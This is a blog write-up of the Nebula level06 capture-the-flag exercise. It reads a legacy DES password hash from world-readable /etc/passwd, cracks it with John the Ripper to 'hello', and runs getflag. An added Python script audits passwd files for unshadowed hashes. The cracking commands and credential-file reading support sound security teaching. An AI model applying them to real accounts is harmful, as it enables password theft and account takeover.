Monday, October 29, 2012

exploit-exercises Nebula: level06

In level06, we are told that the credentials for the flag06 user account come from a legacy Unix system. Let's go straight to the bank.
level06@nebula:~$ cat /etc/passwd | grep flag06
Back in the day, user password hashes were stored in the /etc/passwd file. This is no longer the case: they now live in /etc/shadow, which is only readable by root (and the shadow group). Here, flag06's entry still carries its hash in the world-readable /etc/passwd.
We will use John the Ripper to find the password. JtR goes through the words in the provided wordlist one by one, hashing each word with the same salt and comparing the result with the hash found in /etc/passwd. The run stops once the two hashes match, which means we have guessed the password. The password is hashed with the traditional Unix crypt(3) (DES) scheme.
kroosec@dojo:~$ cat pass06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
kroosec@dojo:~$ john --wordlist=./cain.txt pass06
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100%  c/s: 270933  trying: heliolog - helvella
Use the "--show" option to display all of the cracked passwords reliably
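As an added example (not from the original write-up or from the Nebula project), the audit below does what a defender would want here: it parses /etc/passwd-format lines, flags any account whose password field still holds a hash instead of the x placeholder, names the hash scheme, and shows the comparison a wordlist attack such as JtR performs (crypt() of a candidate with the stored two-character salt against the stored value). The flag06 line is the one from the level; the other entries are constructed.

```python
import re

# Constructed sample in /etc/passwd format (flag06 line taken from the level,
# the other accounts are made up to show correctly shadowed entries).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
level06:x:1006:1006::/home/level06:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""

# Traditional crypt(3): 13 chars from [./0-9A-Za-z], 2-char salt + 11-char DES output.
TRADITIONAL_DES = re.compile(r"^[./0-9A-Za-z]{13}$")
# Modular crypt formats announce their scheme in a $id$ prefix.
MODULAR_IDS = {"1": "MD5-crypt", "5": "SHA-256-crypt", "6": "SHA-512-crypt", "y": "yescrypt"}

def classify_field(field):
    """Return None if the password field holds no crackable hash, else the scheme name."""
    if field in ("", "x") or field[0] in "!*":   # shadowed, locked or disabled
        return None
    if field.startswith("$"):
        scheme_id = field.split("$")[1]
        return MODULAR_IDS.get(scheme_id, "modular-crypt ($%s$)" % scheme_id)
    if TRADITIONAL_DES.match(field):
        return "Traditional DES crypt"
    return "unrecognised"

def find_unshadowed(passwd_text):
    """Return (user, scheme, hash) for every line whose password field is a real hash."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) != 7:
            continue
        scheme = classify_field(fields[1])
        if scheme is not None:
            hits.append((fields[0], scheme, fields[1]))
    return hits

def verify_traditional(candidate, stored):
    """One step of a wordlist attack: crypt() the candidate with the stored salt
    (first two chars) and compare. Returns None if this Python has no usable crypt()."""
    try:
        import crypt  # deprecated in 3.11, removed in 3.13; DES may be disabled in libxcrypt
        digest = crypt.crypt(candidate, stored[:2])
    except (ImportError, OSError):
        return None
    return None if digest is None else digest == stored

if __name__ == "__main__":
    for user, scheme, h in find_unshadowed(SAMPLE_PASSWD):
        print(f"{user}: {scheme} hash exposed in world-readable /etc/passwd")
```

Run against the real /etc/passwd, any hit means the account's hash is exposed to every local user exactly as flag06's was here; the fix is moving it into /etc/shadow (pwconv) and rotating the password.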
It didn't take long! The password is trivial: "hello". We log in as the flag06 user and run getflag!
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account
